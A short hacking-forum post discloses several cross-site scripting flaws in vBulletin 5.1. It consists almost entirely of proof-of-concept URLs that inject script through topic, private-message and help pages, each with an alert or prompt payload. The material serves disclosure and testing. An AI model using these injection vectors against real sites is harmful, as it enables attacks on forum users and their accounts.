Hello There, Guest! Login Register
Logo
Dismiss this notice
MaDLeeTs is not responsible for any attacks that are carried out on networks, websites or servers.
MaDLeeTs staff members cannot be held responsible.
All information on this forum is for educational purposes only.


vBulletin 5.1 Multiple XSS vulnerabilities

  • 0 Vote(s) - 0 Average


04-22-2014, 06:45 AM #1
CarCaBot Offline Junior Member **
Registered
Posts:6 Threads:1 Joined:Dec 2013 Reputation: 0
Mood: None
[Image: JCBxhl1.jpg]

[XSS] Random topic
Code:
https://website.com/[forum_path]/forum/anunturi-importante/rst-power/67030-rst-admin-restore?view=stream1337";alert(123);//


[XSS] New private message
Code:
https://website.com/[forum_path]/privatemessage/new/9999"><input onfocus=alert(1) autofocus>

[XSS] View PM: you must know or bruteforce private message ID (830372)
Code:
https://website.com/[forum_path]/privatemessage/view/830372?folderid=random";alert(1);//


[DOM XSS] Help
Code:
[forum_path]/help#'"><img src=x onerror=prompt("PoC")>

Credits : Romanian Security Team 2014






Forum Jump:


Users browsing this thread:1 Guest(s)